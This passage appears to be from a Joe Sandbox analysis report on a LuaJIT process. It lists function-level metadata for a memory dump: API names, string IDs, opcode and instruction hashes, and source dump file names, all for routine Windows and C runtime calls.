                                                      • Opcode ID: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                      • Instruction ID: 0f5f5975883f01d24d5f939a152f73207aabaf527e255b01c0a7640a233dfd62
                                                      • Opcode Fuzzy Hash: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                      • Instruction Fuzzy Hash: BA914E2361CB8581DB609B19E49036EB760F7D6BA4F504232DBAD87BACDF7CD5448B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: String$try_get_function
                                                      • String ID: LCMapStringEx
                                                      • API String ID: 1203122356-3893581201
                                                      • Opcode ID: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                      • Instruction ID: 3c9497af95d5aa11bb6fe974cda46c8232bb55495dac442e387c99fd929be75a
                                                      • Opcode Fuzzy Hash: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                      • Instruction Fuzzy Hash: B6113E71A08B8186D760DB59B4802AAB7A0FBDABD5F54423AEF8D53B5DCF7CD4408B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AddressCallerLibraryLoadProc
                                                      • String ID: SystemFunction036$advapi32.dll
                                                      • API String ID: 4215043672-1354007664
                                                      • Opcode ID: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                      • Instruction ID: a9ae6212971a8bd50bf86412f2a5cfa283f5a5720f39a63f60a00308d5f3f1ad
                                                      • Opcode Fuzzy Hash: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                      • Instruction Fuzzy Hash: CB115631E1C64281FB50BB18E449375E3A0FBAA34AFD44131DB4E4299CDFBCE544C620
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF7B1E6EDD3), ref: 00007FF7B1E6F013
                                                      • LoadLibraryExA.KERNELBASE(?,?,?,?,?,?,00007FF7B1E6EDD3), ref: 00007FF7B1E6F034
                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B1E317E7), ref: 00007FF7B1E6F061
                                                        • Part of subcall function 00007FF7B1E6EE80: GetLastError.KERNEL32 ref: 00007FF7B1E6EE96
                                                        • Part of subcall function 00007FF7B1E6EE80: FormatMessageA.KERNEL32 ref: 00007FF7B1E6EECA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$FormatLibraryLoadMessage
                                                      • String ID: cannot load module '%s': %s
                                                      • API String ID: 3853237079-2554058836
                                                      • Opcode ID: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                      • Instruction ID: 9af3b0367e0582fd35ecf5ef585b2e41e073850632f7487f7d37b3f980783589
                                                      • Opcode Fuzzy Hash: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                      • Instruction Fuzzy Hash: 7EF04622A18A81C2E710EB18E84021AB770FBDA799F940135EB8C42A2CDF7CC1848A00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                      • String ID:
                                                      • API String ID: 1452418845-0
                                                      • Opcode ID: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                      • Instruction ID: b17b4e2f8e8a2f6b3745a95f23d78e5ebc551c21013e192c720080fbb55a2a60
                                                      • Opcode Fuzzy Hash: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                      • Instruction Fuzzy Hash: 2D313E21E0828686FB14BB6C94593B99291AF6378EFC54435E74D87ADFDEECA5048230
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$QueryVirtual
                                                      • String ID:
                                                      • API String ID: 3696288210-0
                                                      • Opcode ID: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                      • Instruction ID: 911500e0af8439638fbc8428fef4cc2b3c1c65c68248007234406001cff3d4e2
                                                      • Opcode Fuzzy Hash: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                      • Instruction Fuzzy Hash: 51213521A1DA4181EB609B1DE445629B7B4FBA97D9F600335E78D427BCDF7CD440CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $
                                                      • API String ID: 0-227171996
                                                      • Opcode ID: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                      • Instruction ID: 10abe5f3350729db729cdda96c4e26a57b01e19cd8c3f862998d77ffaa1c3351
                                                      • Opcode Fuzzy Hash: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                      • Instruction Fuzzy Hash: C6022336618B8585DB709B1DD49422EB3A0F79ABA8F504731EBAD877E9CF7CD4408B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: \
                                                      • API String ID: 1452528299-2967466578
                                                      • Opcode ID: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                      • Instruction ID: 625aef408bef40905ddfcff798e2a580faabab736a25dcfd1c419aeded380914
                                                      • Opcode Fuzzy Hash: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                      • Instruction Fuzzy Hash: F1511D32A18B8586DB50DB1DE480269B7B0F799BA8F504235EBAD877A8CF7CD541CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                      • Instruction ID: 8103a084393560bc9e6363e8414953255e8bc5dfb396027e32052b547f330103
                                                      • Opcode Fuzzy Hash: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                      • Instruction Fuzzy Hash: DDE04820B1830683EB147779588537D92526FA774BF848439D65E4235ACDBDE4488360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$AllocVirtual
                                                      • String ID:
                                                      • API String ID: 1225938287-0
                                                      • Opcode ID: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                      • Instruction ID: ca427a9b8f651f4b20a3acb874bfa3b8017ed250ccf65f2a5bda2684e4006037
                                                      • Opcode Fuzzy Hash: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                      • Instruction Fuzzy Hash: 5CF0F971A29A81C6D720AB18E48471AA760F7997A9F540324F6AD02BECCF7CC1548B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$AllocVirtual
                                                      • String ID:
                                                      • API String ID: 1225938287-0
                                                      • Opcode ID: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                      • Instruction ID: 1dc51dcf68838319a2b33029018457f82df6b65ce85c1548f8c065dc042e66c6
                                                      • Opcode Fuzzy Hash: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                      • Instruction Fuzzy Hash: 1FF01D71A29B81C2D720AB58E44571AB760F7997A9F544324E6AE02BECCF7CC144CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID:
                                                      • API String ID: 3418686817-3916222277
                                                      • Opcode ID: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                      • Instruction ID: 4ac22cb6566618b0230fd4fb4c694f2cc3ffc29e0fe30ee49adf7b55c1e2874a
                                                      • Opcode Fuzzy Hash: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                      • Instruction Fuzzy Hash: AD51C636619A8586DB50DB19E08032AB7B0F7DAB94F505136FB8E87B6CCB7DD9418F00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-3916222277
                                                      • Opcode ID: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                      • Instruction ID: 0fae9bd28011a154ef0d71ffb09f97b05196ddabda64af19c4cd5b60f0f51e88
                                                      • Opcode Fuzzy Hash: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                      • Instruction Fuzzy Hash: A451E47291C6C186E7109F28D4443AEBBA0F769B4DF944135E78D47B89CBBCD505CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _wcsupr_s
                                                      • String ID: arg
                                                      • API String ID: 600324503-2022414218
                                                      • Opcode ID: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                      • Instruction ID: 964c2b85932636d5d4587c1b4715d9573de1325d349280a5b15ae03d2c97bc05
                                                      • Opcode Fuzzy Hash: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                      • Instruction Fuzzy Hash: 9431493660854186DB20EB1DD44126AB3A0FBDA799F904231F78D8779DDF7DD9018F10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: try_get_function
                                                      • String ID: AppPolicyGetProcessTerminationMethod
                                                      • API String ID: 2742660187-2031265017
                                                      • Opcode ID: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                      • Instruction ID: 488b5f70182ae37e06a043be335de6a91c23a498b7a052fb5570be42aec17de3
                                                      • Opcode Fuzzy Hash: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                      • Instruction Fuzzy Hash: 98E0D891E0590681FF0467D964401B052109F2A7B9ECC4335FB3C073D88DAC95808220
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00007FF7B1EC63F0: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF7B1EC6714,?,?,?,?,00000000,COMSPEC,?,00007FF7B1EC69AE), ref: 00007FF7B1EC641A
                                                      • IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF7B1EC67C7,?,?,?,?,00000000,COMSPEC,?,00007FF7B1EC69AE), ref: 00007FF7B1EC6A43
                                                      • GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF7B1EC67C7,?,?,?,?,00000000,COMSPEC,?,00007FF7B1EC69AE), ref: 00007FF7B1EC6A8F
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CodeInfoPageValid
                                                      • String ID:
                                                      • API String ID: 546120528-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF7B1EB60FF,?,?,COMSPEC,00007FF7B1EB65F2), ref: 00007FF7B1EC6D39
                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF7B1EB60FF,?,?,COMSPEC,00007FF7B1EB65F2), ref: 00007FF7B1EC6DFD
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$Free
                                                      • String ID:
                                                      • API String ID: 3328510275-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                      • String ID:
                                                      • API String ID: 3548387204-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7B1EBD50B,?,?,00000000,00007FF7B1EBD5B3,?,?,?,?,?,?,00007FF7B1EAAF6A), ref: 00007FF7B1EBD63E
                                                      • GetLastError.KERNEL32(?,?,?,00007FF7B1EBD50B,?,?,00000000,00007FF7B1EBD5B3,?,?,?,?,?,?,00007FF7B1EAAF6A), ref: 00007FF7B1EBD648
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                      • String ID:
                                                      • API String ID: 1687624791-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
